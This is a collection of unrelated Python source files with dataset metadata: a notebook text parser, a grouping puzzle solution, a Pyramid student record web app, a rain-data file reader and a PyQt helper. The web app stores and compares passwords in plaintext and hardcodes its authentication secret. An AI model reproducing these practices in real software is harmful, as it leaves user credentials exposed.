ScriptingCell(*fields)\n fields[0] = fields[1] = NULL_TEXEL\n cells.append(cell)\n\n \n for line in s.split('\\n'):\n if rx_in(line):\n flush()\n mode = IN\n elif rx_out(line):\n if mode != IN:\n flush()\n else:\n fields[0] = create_texel()\n mode = OUT\n elif rx_text(line):\n flush()\n mode = TEXT\n else:\n l.append(line)\n if l:\n flush()\n model = TextModel()\n for cell in cells:\n model.append(mk_textmodel(cell))\n return model\n\n\ndef test_00():\n text = \"\"\"[In 1]:\n1+2\n[Out 2]:\n3\n[Text]:\nZeile 1\nZeile 2\n\"\"\"\n m = fromtext(text)\n #m.texel.dump()\n print(totext(m))\n t = totext(m)\n print(repr(text))\n print(repr(t))\n assert t == text
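\n\n# --- Editor's note, not part of the original module: the cell markers\n# round-trip through the regexes above, e.g. rx_in(\"[In 1]:\") matches and\n# captures \"1\", rx_out(\"[Out 2]:\") captures \"2\", and rx_text(\"[Text]:\")\n# matches, which is why totext(fromtext(s)) can reproduce s in test_00.\n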
text\n","sub_path":"pynotebook/pynotebook/textformat.py","file_name":"textformat.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"344368768","text":"def checkGroup(person_set, groups):\n # 나중에 포함되는 그룹을 묶기 위해 각 인덱스를 모아준다.\n idxs = []\n\n for idx, group in enumerate(groups):\n # 일단 각 그룹을 돌면서 교차하는게 있으면 그룹을 업데이트\n if len(person_set & group) > 0:\n # 인덱스도 idxs에 추가\n idxs.append(idx)\n # 기존 그룹은 합친걸로 교체\n groups[idx] = group | person_set\n\n # 예로,\n # 초기엔 {1,2} {4,5} 처럼 두개 그룹이다가 {2,4}를 넣고 난 이후에 겹치는 경우가 생김\n # 이후 겹치는게 두개 이상 인지 확인 => {1,2,4} {2,4,5} => 두개를 합쳐야함\n if len(idxs) > 1:\n\n # 새로운 그룹을 만들어서\n new_group = set()\n # 모아놓은 인덱스들을 거꾸로 돌면서 (앞에서부터 제거하면 인덱스순서가 달라지니까)\n for i in idxs[::-1]:\n # 새로운 그룹에 합치고\n new_group = new_group | groups[i]\n # 기존 그룹은 그룹들에서 제거\n groups.pop(i)\n\n # 새로합친 그룹을 그룹들에 추가\n groups.append(new_group)\n\n # 겹치는게 없을땐 단순하게 그룹들에 추가\n if not idxs:\n groups.append(person_set)\n\n return groups\n\n\nT = int(input())\n\nfor t in range(1, T+1):\n N, M = map(int, input().split())\n\n groups = []\n\n # 모든 사람을 먼저 그룹에 넣자\n for p in range(1, N+1):\n groups.append({str(p)})\n\n # 케이스마다 그룹 체킹\n for _ in range(M):\n a, b = input().split()\n\n groups = checkGroup({a, b}, groups)\n\n print(f\"#{t} {len(groups)}\")\n","sub_path":"PYTHON/SWEXPERT/7465_창용마을무리의개수/7645_1.py","file_name":"7645_1.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"233420552","text":"from pyramid.authentication import AuthTktAuthenticationPolicy\r\nfrom pyramid.authorization import ACLAuthorizationPolicy\r\nfrom pyramid.config import Configurator\r\nfrom pyramid.httpexceptions import HTTPForbidden, HTTPFound, HTTPNotFound\r\nfrom pyramid.view import forbidden_view_config, view_config\r\nfrom pyramid.security import ALL_PERMISSIONS, Allow, Deny, Authenticated, authenticated_userid, forget, remember, effective_principals\r\n\r\nfrom sqlalchemy import create_engine, Column, Integer, String, ForeignKey\r\nfrom sqlalchemy.orm import sessionmaker, relationship, backref\r\nfrom datetime import datetime\r\n\r\nengine = create_engine('sqlite:///studentRecordSystem.db', echo=True)\r\n# engine = create_engine('sqlite:///studentRecordSystem.db?check_same_thread=False')\r\n\r\nfrom sqlalchemy.ext.declarative import declarative_base\r\nBase = declarative_base()\r\n\r\n### DEFINE MODEL\r\nclass Association(Base):\r\n __tablename__ = 'association'\r\n class_id = Column(Integer, ForeignKey('classes.id'), primary_key=True)\r\n student_id = Column(Integer, ForeignKey('students.id'), primary_key=True)\r\n grade = Column(String(2))\r\n status = Column(String(9))\r\n theClass = relationship(\"Class\")\r\n \r\nclass Student(Base):\r\n __tablename__ = 'students'\r\n id = Column(Integer, primary_key=True)\r\n forename = Column(String(20), nullable=False)\r\n surname = Column(String(20), nullable=False)\r\n address = Column(String(50), nullable=False)\r\n classlist = relationship(\"Association\")\r\n interventionlist = relationship(\"Intervention\", backref='students')\r\n\r\nclass Class(Base):\r\n __tablename__ = 'classes'\r\n id = Column(Integer, primary_key=True)\r\n name = Column(String(20), nullable=False)\r\n teacher_id = Column(Integer, ForeignKey('teachers.id')) \r\n students = relationship(\"Student\", secondary=\"association\",\r\n backref=\"classes\")\r\n \r\nclass Intervention(Base):\r\n __tablename__ = 'interventions'\r\n id = 
Column(Integer, primary_key=True)\r\n date_time = Column(String(15))\r\n content = Column(String(300), nullable=False)\r\n teacher_id = Column(Integer, ForeignKey('teachers.id'))\r\n student_id = Column(Integer, ForeignKey('students.id'))\r\n made_by = relationship(\"Teacher\")\r\n applies_to = relationship(\"Student\")\r\n\r\nclass User(Base):\r\n __tablename__ = 'users'\r\n id = Column(Integer, primary_key=True)\r\n title = Column(String(4), nullable=False)\r\n surname = Column(String(20), nullable=False)\r\n username = Column(String(10), nullable=False)\r\n password = Column(String(8), nullable=False)\r\n\r\n # Method of User object\r\n def check_password(self, passwd):\r\n return self.password == passwd\r\n \r\nclass Administrator(User):\r\n __tablename__ = 'administrators'\r\n id = Column(Integer, ForeignKey(\"users.id\"), primary_key=True)\r\n \r\nclass Teacher(User):\r\n __tablename__ = 'teachers'\r\n id = Column(Integer, ForeignKey('users.id'), primary_key=True)\r\n teaches = relationship(\"Class\", backref=\"taught_by\")\r\n \r\nclass Director(Teacher): \r\n __tablename__ = 'directors'\r\n id = Column(Integer, ForeignKey('teachers.id'), primary_key=True)\r\n\r\nclass Assistant(User):\r\n __tablename__ = 'assistants'\r\n id = Column(Integer, ForeignKey(\"users.id\"), primary_key=True)\r\n\r\nBase.metadata.create_all(engine)\r\nSession = sessionmaker(bind=engine)\r\nsession = Session()\r\n\r\n# Commits session to create tables in database.\r\nsession.commit()\r\n\r\n### MAP GROUPS TO PERMISSIONS\r\n\r\nclass Root(object):\r\n # Using Access Control List to assign different permissions to each type of user.\r\n __acl__ = [\r\n (Allow, Authenticated, 'view'),\r\n (Allow, 'administrator', ('register', 'edit', 'enrol')),\r\n\t(Allow, 'director', 'enrol'),\r\n (Allow, 'teacher', ('intervene', 'edit')),\r\n ]\r\n def __init__(self, request):\r\n self.request = request\r\n\r\n \r\ndef rolefinder(login, request):\r\n if session.query(Director).filter_by(username = login).first():\r\n return [ 'teacher', 'director']\r\n elif session.query(Teacher).filter_by(username = login).first():\r\n return [ 'teacher' ]\r\n elif session.query(Administrator).filter_by(username = login).first():\r\n return ['administrator']\r\n elif session.query(Assistant).filter_by(username = login).first():\r\n return ['assistant']\r\n else:\r\n return []\r\n\r\n### DEFINE VIEWS\r\n\r\n# Copied from Michael Merickel's tutorial, with additional comments\r\n@forbidden_view_config()\r\ndef forbidden_view(request):\r\n # Authorization failure because lacking permission\r\n if authenticated_userid(request):\r\n return HTTPForbidden()\r\n\r\n # Authorization failure because not logged in\r\n loc = request.route_url('login', _query=(('next', request.path),))\r\n return HTTPFound(location=loc)\r\n\r\n@view_config(\r\n route_name='home',\r\n permission=\"view\", # invokes forbidden_view if not authenticated\r\n renderer='home.mako' # template for each view\r\n )\r\ndef home_view(request):\r\n roles = effective_principals(request)\r\n # login occurs in roles after 'system.Everyone' and 'system.Authenticated'\r\n login = roles[2]\r\n\r\n # Obtain user object and all class objects from database\r\n user = session.query(User).filter_by(username = login).first()\r\n classes = session.query(Class).all()\r\n\r\n # Determine values of remaining variables required by template\r\n isAdministrator = isTeacher = False\r\n interventions = classesTaught = []\r\n if 'administrator' in roles:\r\n isAdministrator = True\r\n elif 'teacher' in 
roles:\r\n isTeacher = True\r\n classesTaught = session.query(Class).filter_by(teacher_id=user.id).all()\r\n\t# Shows the 10 most recent interventions created\r\n interventions = session.query(Intervention).order_by(Intervention.id.desc()).limit(10).all()\r\n\r\n return {\r\n # Returns values required in templates\r\n 'login' : login,\r\n 'user' : user,\r\n 'classes' : classes,\r\n 'isAdministrator' : isAdministrator,\r\n 'isTeacher' : isTeacher,\r\n 'classesTaught' : classesTaught,\r\n 'interventions': interventions,\r\n }\r\n\r\n# Copied from Michael Merickel's tutorial, replacing one line and removing unused element from dictionary\r\n@view_config(\r\n route_name='login',\r\n renderer='login.mako',\r\n)\r\ndef login_view(request):\r\n # Redirect logged in user to home page\r\n if authenticated_userid(request):\r\n return HTTPFound(location=request.route_url('home'))\r\n next = request.params.get('next') or request.route_url('home')\r\n login = ''\r\n did_fail = False\r\n if 'submit' in request.POST:\r\n login = request.POST.get('login', '')\r\n passwd = request.POST.get('passwd', '')\r\n \r\n # Obtain user object from database\r\n user = session.query(User).filter_by(username=login).first()\r\n\r\n if user and user.check_password(passwd):\r\n\t # Used to locally store cookie, named auth_tkt, to set users credentials\r\n headers = remember(request, login)\r\n return HTTPFound(location=next, headers=headers)\r\n did_fail = True\r\n\r\n return {\r\n 'login': login,\r\n 'next': next,\r\n 'failed_attempt': did_fail,\r\n }\r\n\r\n# Copied from Michael Merickel's tutorial, changing a route\r\n@view_config(\r\n route_name='logout',\r\n)\r\ndef logout_view(request):\r\n # 'forget()' used to delete locally stored AuthTkt cookie, to remove credentials provided by user\r\n headers = forget(request)\r\n loc = request.route_url('login')\r\n return HTTPFound(location=loc, headers=headers)\r\n\r\n# Copied from Michael Merickel's tutorial and querying through database, instead of through a dictionary\t\r\n@view_config(\r\n route_name='users',\r\n permission=\"register\",\r\n renderer='users.mako'\r\n )\r\ndef users_view(request):\r\n # Obtain all user objects from database\r\n users = session.query(User).order_by(User.surname.asc(), User.id.asc()).all()\r\n return {\r\n 'users' : users\r\n }\r\n\t\r\n@view_config(\r\n route_name='user',\r\n permission=\"register\",\r\n renderer='user.mako',\r\n)\r\ndef user_view(request):\r\n id = request.matchdict['id']\r\n user = session.query(User).filter_by(id = id).first()\r\n if not user:\r\n raise HTTPNotFound()\r\n return {\r\n 'user': user,\r\n }\r\n\r\ndef validate_user(surname, username, passwd, password):\r\n errors = []\r\n\t\r\n # strip() gets rid of leading or trailing characters\r\n surname = surname.strip()\r\n if not surname:\r\n errors.append('Surname must not be empty, please enter surname')\r\n elif len(surname) > 20:\r\n errors.append('Please shorten surname to atmost 20 characters')\r\n # Ensures input contains only letters\r\n elif surname.isalpha() == False:\r\n errors.append('Surname must only contain letters, please re-enter surname')\r\n\r\n username = username.strip()\r\n if not username:\r\n errors.append('Username must not be empty, please enter username')\r\n elif len(username) > 10:\r\n errors.append('Please shorten username to atmost 10 characters')\r\n # Checks database to verify username is unique\r\n usernameInUse = session.query(User).filter_by(username = username).first()\r\n if usernameInUse:\r\n errors.append('Username is already 
in use, please enter a different username')\r\n \r\n for p in [passwd, password]:\r\n p = p.strip()\r\n if not p:\r\n errors.append('Password must not be empty, please enter a password')\r\n elif len(p) < 5 :\r\n errors.append('Password must be at least 5 characters long, please enter a password')\r\n\t\r\n # confirms password entered is the one desired\r\n if passwd != password:\r\n errors.append('Password fields must match, please try again')\r\n return {\r\n 'surname': surname,\r\n 'username': username,\r\n 'password' : password,\r\n 'passwd': passwd,\r\n 'errors': errors,\r\n }\r\n\r\n@view_config(\r\n route_name='register',\r\n permission='register',\r\n renderer='edit_user.mako'\r\n)\r\ndef register_user(request):\r\n # 'role' extracted from the URL \r\n role = request.matchdict['role']\r\n if not role in ['administrator', 'teacher', 'director', 'assistant']:\r\n raise HTTPNotFound()\r\n \r\n errors = []\r\n surname = username = password = ''\r\n \r\n # Uses template to retrieve values for variables\r\n if request.method == 'POST':\r\n title = request.POST.get('title') \r\n surname = request.POST.get('surname', '')\r\n username = request.POST.get('username', '') \r\n passwd = request.POST.get('passwd', '')\r\n password = request.POST.get('password', '') \r\n\r\n v = validate_user(surname, username, passwd, password)\r\n surname = v['surname']\r\n username = v['username']\r\n passwd = v['passwd']\r\n password = v['password']\r\n errors += v['errors']\r\n\r\n # stores all attributes of user in dictionary\r\n attributes = {'title': title,\r\n 'surname': surname.capitalize(),\r\n 'username': username,\r\n 'password': password\r\n }\r\n if not errors:\r\n # Use ** operator to unpack dictionary to deliver keyword arguments\r\n if role == 'administrator':\r\n newUser = Administrator(**attributes)\r\n elif role == 'teacher':\r\n newUser = Teacher(**attributes)\r\n elif role == 'director':\r\n newUser = Director(**attributes)\r\n else: # role == 'assistant':\r\n newUser = Assistant(**attributes)\r\n session.add(newUser)\r\n session.commit()\r\n \r\n url = request.route_url('user', id=newUser.id)\r\n return HTTPFound(location=url)\r\n\r\n return {\r\n 'surname': surname,\r\n 'username': username,\r\n 'password' : password,\r\n 'errors': errors\r\n }\r\n\r\n@view_config(\r\n route_name='students',\r\n permission=\"view\",\r\n renderer='students.mako'\r\n )\r\ndef students_view(request):\r\n roles = effective_principals(request)\r\n # login occurs in roles after 'system.Everyone' and 'system.Authenticated'\r\n login = roles[2]\r\n\t\r\n # Locates user object with the same username as in 'effective_principals'\r\n user = session.query(User).filter_by(username = login).first()\r\n\r\n # List of all students in alphabetical order\r\n students = session.query(Student).order_by(Student.surname.asc(), Student.forename.asc(), Student.id.asc()).all()\r\n isAdministrator = isTeacher = False\r\n classesTaught = studentsTaught = []\r\n\r\n if 'administrator' in roles:\r\n isAdministrator = True\r\n if 'teacher' in roles:\r\n isTeacher = True\r\n # Finds all classes taught by the user\r\n classesTaught = session.query(Class).filter_by(teacher_id = user.id).all()\r\n\t\t\r\n # Use set comprehension to remove duplicate students\r\n setOfStudentsTaught = {st for cl in classesTaught for st in cl.students}\r\n # Use list comprehension to put in alphabetical order \r\n studentsTaught = [st for st in students if st in setOfStudentsTaught] \r\n\r\n return {\r\n 'students' : students,\r\n\t'isAdministrator': 
isAdministrator,\r\n\t'isTeacher': isTeacher,\r\n\t'classesTaught': classesTaught,\r\n\t'studentsTaught': studentsTaught,\r\n    }\r\n\r\n@view_config(\r\n    route_name='student',\r\n    permission=\"view\",\r\n    renderer='student.mako'\r\n    )\r\ndef student_view(request):\r\n    roles = effective_principals(request)\r\n    login = roles[2]\r\n    id = request.matchdict['id']\r\n    # Finds student object using ID in URL and matching to ID in students table\r\n    student = session.query(Student).filter_by(id = id).first()\r\n    if not student:\r\n        raise HTTPNotFound()\r\n    \r\n    isTeacher = isAssistant = False\r\n    \r\n    if 'teacher' in roles:\r\n        isTeacher = True\r\n    if 'assistant' in roles:\r\n        isAssistant = True\r\n    \r\n    return {\r\n        'student': student,\r\n\t'isTeacher': isTeacher,\r\n\t'isAssistant': isAssistant,\r\n    }\r\n\r\ndef validate_student(forename, surname, address):\r\n    errors = []\r\n\r\n    forename = forename.strip()\r\n    if not forename:\r\n        errors.append('Forename may not be empty, please enter forename')\r\n    elif len(forename) > 20:\r\n        errors.append('Please shorten forename to at most 20 characters')\r\n    elif forename.isalpha() == False:\r\n        errors.append('Forename must only contain letters, please re-enter forename')\r\n\r\n    surname = surname.strip()\r\n    if not surname:\r\n        errors.append('Surname may not be empty, please enter surname')\r\n    elif len(surname) > 20:\r\n        errors.append('Please shorten surname to at most 20 characters')\r\n    elif surname.isalpha() == False:\r\n        errors.append('Surname must only contain letters, please re-enter surname')\r\n\t\t\r\n    address = address.strip()\r\n    if not address:\r\n        errors.append('Address may not be empty, please enter address')\r\n    elif len(address) > 50:\r\n        errors.append('Please shorten address to at most 50 characters')\r\n\t\t\r\n    return {\r\n        'forename': forename,\r\n        'surname': surname,\r\n        'address': address,\r\n        'errors': errors,\r\n    }\r\n\r\n@view_config(\r\n    route_name='add_student',\r\n    permission='register',\r\n    renderer='edit_student.mako'\r\n)\r\ndef add_student(request): \r\n    errors = []\r\n    forename = surname = address = ''\r\n    if request.method == 'POST':\r\n        forename = request.POST.get('forename', '')\r\n        surname = request.POST.get('surname', '')\r\n        address = request.POST.get('address', '')\r\n\r\n        v = validate_student(forename, surname, address)\r\n        forename = v['forename']\r\n        surname = v['surname']\r\n        address = v['address']\r\n        errors += v['errors']\r\n\r\n        if not errors:\r\n            newStudent = Student(forename=forename.capitalize(), surname=surname.capitalize(), address=address)\r\n            session.add(newStudent)\r\n            session.commit()\r\n            url = request.route_url('student', id=newStudent.id)\r\n            return HTTPFound(location=url)\r\n\r\n    return {\r\n        'forename': forename,\r\n        'surname': surname,\r\n        'address': address,\r\n        'errors': errors,\r\n    }\r\n\r\ndef validate_intervention(content):\r\n    errors = []\r\n    content = content.strip()\r\n    if not content:\r\n        errors.append('Content may not be empty, please enter content')\r\n    elif len(content) > 300:\r\n        errors.append('Please shorten content to at most 300 characters')\r\n    return {\r\n        'content': content,\r\n        'errors': errors,\r\n    }\r\n\r\n@view_config(\r\n    route_name='intervene',\r\n    permission='intervene',\r\n    renderer='intervene.mako'\r\n    )\r\ndef edit_intervention(request):\r\n    login = authenticated_userid(request)\r\n    # Locates user object with the same username as the one in request, from database\r\n    user = session.query(User).filter(login == User.username).first()\r\n    \r\n    errors = []\r\n    date_time = 
content = ''\r\n student_id = request.matchdict['id']\r\n if request.method == 'POST':\r\n content = request.POST.get('content', '')\r\n\r\n v = validate_intervention(content)\r\n content = v['content']\r\n errors += v['errors']\r\n\r\n if not errors:\r\n\t # Formatted to show date time format as dd/mm/yy HH:MM\r\n date_time = datetime.now().strftime(\"%d/%m/%y %H:%M\")\r\n int1 = Intervention(date_time=date_time, content=content)\r\n session.add(int1)\r\n # Assigning foreign keys to Intervention object for relationships between tables\r\n int1.student_id = student_id\r\n int1.teacher_id = user.id\r\n session.commit()\r\n url = request.route_url('student', id=student_id)\r\n return HTTPFound(location=url)\r\n return {\r\n 'date_time': date_time,\r\n 'content': content,\r\n 'student_id': student_id,\r\n 'user': user,\r\n 'errors': errors,\r\n }\r\n\r\n@view_config(\r\n route_name='edit_student_in_class',\r\n permission=\"edit\",\r\n renderer='edit.mako'\r\n )\r\ndef edit_student_in_class_view(request):\r\n student_id = request.matchdict['id']\r\n class_id = request.matchdict['classId']\r\n\t\r\n roles = effective_principals(request)\r\n login = roles[2]\r\n # Finds user object by looking up username with the one from effective_principals\r\n user = session.query(User).filter_by(username = login).first()\r\n assoc = session.query(Association).filter_by(student_id=student_id, class_id=class_id).first()\r\n cl = session.query(Class).filter_by(id = class_id).first()\r\n \r\n isAdministrator = isTeacher = teachesClass = isDirector = False\r\n\r\n if 'administrator' in roles:\r\n isAdministrator = True\r\n if 'teacher' in roles:\r\n isTeacher = True\r\n if cl.teacher_id == user.id:\r\n teachesClass = True\r\n if 'director' in roles:\r\n isDirector = True\r\n\t\r\n if request.method == 'POST':\r\n # Only teacher can edit grade\r\n if isTeacher:\r\n # Only teacher assigned to the class or director is permitted to change the grades\r\n if teachesClass or isDirector:\r\n grade = request.POST.get('grade')\r\n assoc.grade = grade\r\n else:\r\n return HTTPForbidden()\r\n # Only administrator or director can change status\r\n if isAdministrator or isDirector:\r\n status = request.POST.get('status')\r\n assoc.status = status\r\n session.commit()\r\n url = request.route_url('student', id=student_id)\r\n return HTTPFound(location=url)\r\n\t\t\r\n return {\r\n 'student_id' : student_id,\r\n 'user': user,\r\n 'cl': cl,\r\n 'isAdministrator': isAdministrator,\r\n\t'isTeacher': isTeacher,\r\n 'teachesClass': teachesClass,\r\n\t'isDirector': isDirector,\r\n }\r\n\r\n@view_config(\r\n route_name='classes',\r\n permission=\"view\",\r\n renderer='classes.mako'\r\n )\r\ndef classes_view(request):\r\n roles = effective_principals(request)\r\n login = roles[2]\r\n\t\r\n user = session.query(User).filter_by(username = login).first()\r\n classes = session.query(Class).all()\r\n\r\n isAdministrator = isTeacher = False\r\n classesTaught = []\r\n \r\n if 'administrator' in roles:\r\n isAdministrator = True\r\n if 'teacher' in roles:\r\n isTeacher = True\r\n classesTaught = session.query(Class).filter(Class.teacher_id == user.id).all()\r\n return {\r\n\t'classes' : classes,\r\n\t'isAdministrator': isAdministrator,\r\n\t'isTeacher': isTeacher,\r\n 'classesTaught' : classesTaught,\r\n }\r\n\r\n@view_config(\r\n route_name='class',\r\n permission=\"view\",\r\n renderer='class.mako'\r\n )\r\ndef class_view(request):\r\n id = request.matchdict['id']\r\n cl = session.query(Class).filter_by(id = id).first()\r\n if not cl:\r\n 
raise HTTPNotFound()\r\n    \r\n    roles = effective_principals(request)\r\n    login = roles[2]\r\n    teacher = session.query(User).filter(cl.teacher_id == User.id).first()\r\n\r\n    isAdministrator = isDirector = isAssistant = False\r\n    \r\n    if 'administrator' in roles:\r\n        isAdministrator = True\r\n    if 'director' in roles:\r\n        isDirector = True\r\n    if 'assistant' in roles:\r\n        isAssistant = True\r\n    return {\r\n        'cl': cl,\r\n        'teacher': teacher,\r\n        'isAdministrator': isAdministrator,\r\n        'isDirector': isDirector,\r\n\t'isAssistant': isAssistant,\r\n    }\r\n\r\ndef validate_class(name):\r\n    errors = []\r\n    \r\n    name = name.strip()\r\n    if not name:\r\n        errors.append('Name must not be empty, please enter the name of the class.')\r\n    elif len(name) > 20:\r\n        errors.append('Please shorten name to at most 20 characters')\r\n    # Checks database to verify class name is unique\r\n    classNameInUse = session.query(Class).filter_by(name = name).first()\r\n    if classNameInUse:\r\n        errors.append('The name for your class is already in use, please enter another name.')\r\n    \r\n    return {\r\n        'name': name,\r\n        'errors': errors,\r\n    }\r\n\r\n@view_config(\r\n    route_name='add_class',\r\n    permission='register',\r\n    renderer='create_class.mako'\r\n    )\r\ndef add_class(request):\r\n    errors = []\r\n    name = ''\r\n    if request.method == 'POST':\r\n        name = request.POST.get('name', '')\r\n\r\n        v = validate_class(name)\r\n        name = v['name']\r\n        errors += v['errors']\r\n\r\n        if not errors: # check class exists\r\n            cl = Class(name=name)\r\n            session.add(cl)\r\n            session.commit()\r\n            url = request.route_url('assign_teacher', id=cl.id)\r\n            return HTTPFound(location=url)\r\n\r\n    return {\r\n        'name': name,\r\n        'errors': errors,\r\n    }\r\n\r\n@view_config(\r\n    route_name='assign_teacher',\r\n    permission='register',\r\n    renderer='assign.mako'\r\n    )\r\ndef assign_teacher(request):\r\n    class_id = request.matchdict['id']\r\n    teachers = session.query(Teacher).all()\r\n    \r\n    if 'submit' in request.POST:\r\n        teacher_id = request.POST.get('teacher_id')\r\n        cl = session.query(Class).filter(Class.id==class_id).first()\r\n        # Assigning value to foreign key to establish relationship\r\n        cl.teacher_id = teacher_id\r\n        session.commit()\r\n        url = request.route_url('class', id = class_id)\r\n        return HTTPFound(location=url)\r\n\r\n    return {\r\n        'class_id': class_id,\r\n        'teachers': teachers,\r\n    }\r\n\r\n@view_config(\r\n    route_name='enrol_students',\r\n    permission='enrol',\r\n    renderer='enrol.mako'\r\n    )\r\ndef enrol_students(request):\r\n    class_id = request.matchdict['id']\r\n    currentClass = session.query(Class).filter_by(id=class_id).first()\r\n    students = session.query(Student).all()\r\n\r\n    # Check students exist and are not already enrolled in currentClass\r\n    notEnrolledStudents = [st for st in students if not st in currentClass.students]\r\n\t\r\n    if request.method == 'POST':\r\n        student_ids = request.POST.getall('student_id')\r\n        \r\n        for student_id in student_ids:\r\n\t    # Create new Association object for student with status set by default to 'Active'\r\n            student = Association(class_id=class_id, student_id=student_id, grade='', status='Active')\r\n            session.add(student)\r\n        session.commit()\r\n        url = request.route_url('class', id=class_id)\r\n        return HTTPFound(location=url)\r\n    \r\n    return {\r\n        'currentClass': currentClass,\r\n        'class_id': class_id,\r\n        'notEnrolledStudents': notEnrolledStudents,\r\n    }\r\n\r\n# Copied from Merickel's tutorial, with modified routes, and additional parameters in 
authn_policy\r\n### CONFIGURE PYRAMID\r\n\r\ndef main(global_settings, **settings):\r\n authn_policy = AuthTktAuthenticationPolicy(\r\n settings['auth.secret'],\r\n # Callback passes to userid and request, returns a sequence of principal identifiers if the user exists. \r\n callback=rolefinder,\r\n # Used to timeout session based on inactivity\r\n # The maximum time a newly issued ticket will be considered valid, until expiring\r\n timeout=1200,\r\n # time that must pass before an auth_tkt is automatically reissued as the result of a request which requires authentication\r\n reissue_time=120,\r\n hashalg='sha512'\r\n )\r\n authz_policy = ACLAuthorizationPolicy()\r\n\r\n config = Configurator(\r\n settings=settings,\r\n authentication_policy=authn_policy,\r\n authorization_policy=authz_policy,\r\n root_factory=Root,\r\n )\r\n \r\n config.add_route('login', '/login')\r\n config.add_route('logout', '/logout')\r\n config.add_route('home', '/')\r\n \r\n config.add_route('users', '/users')\r\n config.add_route('user', '/user/{id}')\r\n config.add_route('register', '/register/{role}')\r\n \r\n config.add_route('students', '/students')\r\n config.add_route('student', '/student/{id}')\r\n config.add_route('add_student', '/add_student')\r\n config.add_route('intervene', '/student/{id}/intervene')\r\n config.add_route('edit_student_in_class', '/student/{id}/{classId}')\r\n\r\n config.add_route('classes', '/classes')\r\n config.add_route('class', '/class/{id}')\r\n config.add_route('add_class', '/add_class')\r\n config.add_route('assign_teacher', '/class/{id}/assign')\r\n config.add_route('enrol_students', '/class/{id}/enrol')\r\n\r\n config.scan(__name__)\r\n return config.make_wsgi_app()\r\n\r\n# Copied from Merickels tutorial, changing the auth.secret and switching to a more stable server\r\n### SIMPLE STARTUP\r\nif __name__ == '__main__':\r\n settings = {\r\n # secret should be at least as long as the block size of the selected hash algorithm, 64 characters in the case of sha512\r\n 'auth.secret': '584A07CED70EDBF8146A76133B41D4070EEF41645CC77DB0610383B234FC38EB',\r\n 'mako.directories': '%s:templates' % __name__,\r\n }\r\n app = main({}, **settings)\r\n\r\n '''from waitress import serve\r\n serve(app, host='0.0.0.0', port=5000)'''\r\n from wsgiref.simple_server import make_server\r\n server = make_server('0.0.0.0', 5000, app)\r\n server.serve_forever()\r\n","sub_path":"WorkingProject.py","file_name":"WorkingProject.py","file_ext":"py","file_size_in_byte":27208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"169146698","text":"from __future__ import print_function\nfrom pydoc import help\nfrom pyhdf.SD import *\nimport numpy\nfrom numpy import *\nimport pprint\nfrom netCDF4 import Dataset\nimport glob\nfrom os.path import basename\n\n#writing prediction data into file\n# writePrediction = open('D:/Development/PyCharm/dataset/rain_data/predictions.csv', 'w')\n# writePrediction.truncate()\n#\n# #writing verification data into file\n# writeVerfication = open('D:/Development/PyCharm/dataset/rain_data/verifications.csv', 'w')\n# writeVerfication.truncate()\n\nstarting_time1 = '000000'\nstarting_time = '000000'\n\n# reading predictions files by time\nfor predictions in glob.glob(\"D:/Development/PyCharm/dataset/rain_data/prediction/*\"):\n # saving the time value into datetime variable\n datetime = basename(predictions).split('_')[0]\n print('Date:' + datetime)\n # print(predictions)\n\n print('VERIFICATION DATA')\n # reading verification time\n 
for verification in glob.glob(\"D:/Development/PyCharm/dataset/rain_data/verification/\" + str(datetime) + \"/*\"):\r\n        # print(verification)\r\n        ending_time = basename(verification).split('_')[1]\r\n        # print(ending_time)\r\n\r\n        hdfFile = SD(verification, SDC.READ)\r\n        datasets_dic = hdfFile.datasets()\r\n\r\n        sds_obj = hdfFile.select('acc03_')  # select sds\r\n        data = sds_obj.get()  # get sds data\r\n\r\n        print('Starting Time: ' + starting_time)\r\n        print('Ending Time: ' + ending_time)\r\n        print(data)\r\n        print('-------------------------------')\r\n\r\n        # writeVerfication.write(str(datetime) + '_' + str(starting_time) + ',')\r\n        # writeVerfication.write(str(datetime) + '_' + str(ending_time) + ',')\r\n        #\r\n        # for i in range(0,1155):\r\n        #     for j in range(0,1683):\r\n        #         writeVerfication.write(str(data[0][i][j]))\r\n        #         writeVerfication.write(', ')\r\n        #     # writeVerfication.write('\\n')\r\n        # writeVerfication.write('\\n')\r\n\r\n        starting_time = ending_time\r\n\r\n        # numpy.savetxt(\"D:/Development/PyCharm/dataset/rain_data/foo.csv\", data[0,...], delimiter=\",\",fmt='%d')\r\n\r\n    print('-------------------------------\\n------------------------------\\n------------------------------')\r\n\r\n    print('PREDICTION DATA')\r\n    for core in glob.glob(predictions + str('/*')):\r\n        for rainInfo in glob.glob(core + str('/*')):\r\n\r\n            ending_time1 = basename(rainInfo).split('_')[1]\r\n            # print(ending_time1)\r\n            # print(rainInfo)\r\n\r\n            netcdfFile = Dataset(rainInfo)\r\n            rain = netcdfFile.variables['acc03_']\r\n\r\n            print('Starting Time: ' + starting_time1)\r\n            print('Ending Time: ' + ending_time1)\r\n            print('Prediction Set Title:' + str(basename(core)))\r\n            print(rain[0][:][:])\r\n            print('-------------------------------')\r\n\r\n            # writePrediction.write(str(datetime) + '_' + str(starting_time1) + ',')\r\n            # writePrediction.write(str(datetime) + '_' + str(ending_time1) + ',')\r\n            # writePrediction.write(str(basename(core)))\r\n            #\r\n            # for i in range(0, 1155):\r\n            #     for j in range(0, 1683):\r\n            #         writePrediction.write(str(rain[0][i][j]))\r\n            #         writePrediction.write(', ')\r\n            #     # writePrediction.write('\\n')\r\n            # writePrediction.write('\\n')\r\n\r\n            starting_time1 = ending_time1\r\n\r\n","sub_path":"ReadAllRainFilesDemo.py","file_name":"ReadAllRainFilesDemo.py","file_ext":"py","file_size_in_byte":3381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"310897059","text":"from PyQt5.QtWidgets import QFileDialog, QLineEdit\n\n\nclass TabManager:\n    @staticmethod\n    def get_cover_path(data, label):\n        file_path = QFileDialog().getOpenFileName(None, 'Choose an image', '', 'JPG files (*.jpg);;PNG files (*.png)')\n        if file_path[0] != '':\n            data['cover_path'] = file_path[0]\n            label.setText(f'Cover: {file_path[0]}')\n            label.setToolTip(file_path[0])\n        else:\n            label.setText('Cover: No file selected')\n            data['cover_path'] = None\n\n    @staticmethod\n   